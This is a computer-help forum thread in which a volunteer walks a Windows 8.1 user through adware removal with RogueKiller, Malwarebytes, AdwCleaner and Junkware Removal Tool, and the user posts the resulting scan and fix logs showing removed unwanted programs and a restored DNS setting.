"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
C:\Windows\System32\Tasks\Pool Component2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component2" => key removed successfully
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
"C:\Program Files (x86)\OLBPre" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
C:\Windows\System32\Tasks\Sixth => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Sixth => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
C:\Windows\System32\Tasks\Ijufcyl => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ijufcyl" => key removed successfully
"C:\PROGRA~1\SHOPPE~1" => not found.
"C:\PROGRA~1\SHOPPE~1\Osifch.bat" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
C:\Windows\System32\Tasks\Only-search Updater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Only-search Updater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
C:\Windows\System32\Tasks\Genius => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Genius => moved successfully

==== End of Fixlog 20:30:16 ====
 
We're not done but I'm glad to hear good news :)

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
  • Otherwise just double-click on RogueKiller.exe
  • Pre-scan will start. Let it finish.
  • Click on SCAN button.
  • Wait until the Status box shows Scan Finished
  • Click on Delete.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
  • If RogueKiller has been blocked, do not hesitate to try a few more times. If it really won't run, rename it to winlogon.exe (or winlogon.com) and try again.
Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
NOTE. If you already have MBAM 2.0 installed scroll down.
  • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
  • Launch Malwarebytes Anti-Malware
  • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
If you already have MBAM 2.0 installed:
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
How to get logs:
(Export log to save as txt)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the Scan Log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • Attach that saved log to your next reply.
(Copy to clipboard for pasting into forum replies or tickets)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the Scan Log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.
Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
 
RogueKiller V11.0.6.0 [Jan 4 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : hersheychoco9 [Administrator]
Started from : C:\Users\hersheychoco9\Downloads\RogueKiller.exe
Mode : Delete -- Date : 01/05/2016 21:12:49

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 18 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\DAILYPCCLEAN -> Not selected
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814} (C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll) -> Not selected
[PUP] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[PUP] \Easy Driver Pro Schedule -- "C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe" -> Not selected
[PUP] \SushiLeads -- C:\Program Files (x86)\sushileads\ScheduledTask.exe -> Not selected

¤¤¤ Files : 12 ¤¤¤
[PUP][Folder] C:\Users\hersheychoco9\AppData\Roaming\WTools -> Deleted
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\explorer.exe -> ERROR [5]
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\userinit.exe -> ERROR [5]
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\winlogon.exe -> ERROR [5]
[PUP][Folder] C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\vnsg3AF.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\vnsvBA11.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\vnskFE9C.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4 -> Deleted
[PUP][File] C:\Program Files (x86)\onlysearch\onlysearch\updt.js -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch -> Deleted
[PUP][Folder] C:\Program Files (x86)\Probit Software -> Deleted
[PUP][Folder] C:\Program Files (x86)\Super Optimizer -> Deleted
[PUP][File] C:\Program Files (x86)\Super Optimizer\SupOptStart.exe -> Deleted
[PUP][Folder] C:\Program Files (x86)\sushileads -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\AppResources.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Common.Logging.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\HtmlAgilityPack.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Microsoft.Win32.TaskScheduler.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Newtonsoft.Json.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\NpUpdaterService.exe -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Quartz.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\RestSharp.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\SushiLeadsApplication.exe -> Deleted

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] ac549645ac34136e1ed8d1039e17d487
[BSP] b481a814b9dfd05236432bf6c92742d1 : Empty|VT.Unknown MBR Code
Partition table:
0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 500 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1026048 | Size: 40 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1107968 | Size: 128 MB
3 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1370112 | Size: 750 MB
4 - Basic data partition | Offset (sectors): 2906112 | Size: 942158 MB
5 - [SYSTEM][MAN-MOUNT] Microsoft recovery partition | Offset (sectors): 1932445696 | Size: 10291 MB
User = LL1 ... OK
User = LL2 ... OK
 
Here's the scanned log.
It says paste or attached, so I don't know...

File:
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/5/2016
Scan Time: 9:26 PM
Logfile: Scannedlog2016.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.01.06.01
Rootkit Database: v2016.01.05.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: hersheychoco9

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 387326
Time Elapsed: 13 min, 17 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)
 
# AdwCleaner v5.028 - Logfile created 05/01/2016 at 21:59:40
# Updated 04/01/2016 by Xplode
# Database : 2016-01-04.2 [Server]
# Operating system : Windows 8.1 (x64)
# Username : hersheychoco9 - CHOCOYAUTJA
# Running from : C:\Users\hersheychoco9\Desktop\adwcleaner_5.028.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files\WajaNetEn
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Local\YSearchUtil
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Common\LuaRT
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Store
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
[-] Folder Deleted : C:\Users\hersheychoco9\Documents\Probit Software
[-] Folder Deleted : C:\Windows\Update Pro
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\StormWarnings
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\StormWarnings
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\DhcpUpdater

***** [ Files ] *****


***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : Genius_Interval

***** [ Registry ] *****

[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [WindoWeather.exe]
[-] Key Deleted : HKLM\SOFTWARE\bba161f9-9f31-0676-ab03-19d4f658b1c8
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : HKCU\Software\APN PIP
[-] Key Deleted : HKCU\Software\Store
[-] Key Deleted : HKCU\Software\WTools
[-] Key Deleted : HKCU\Software\Probit Software
[-] Key Deleted : HKCU\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Microsoft\Tinstalls
[-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key Deleted : HKLM\SOFTWARE\NpApp
[-] Key Deleted : HKLM\SOFTWARE\SmartDNS
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]

***** [ Web browsers ] *****


*************************

:: "Tracing" keys removed
:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [4679 bytes] ##########
 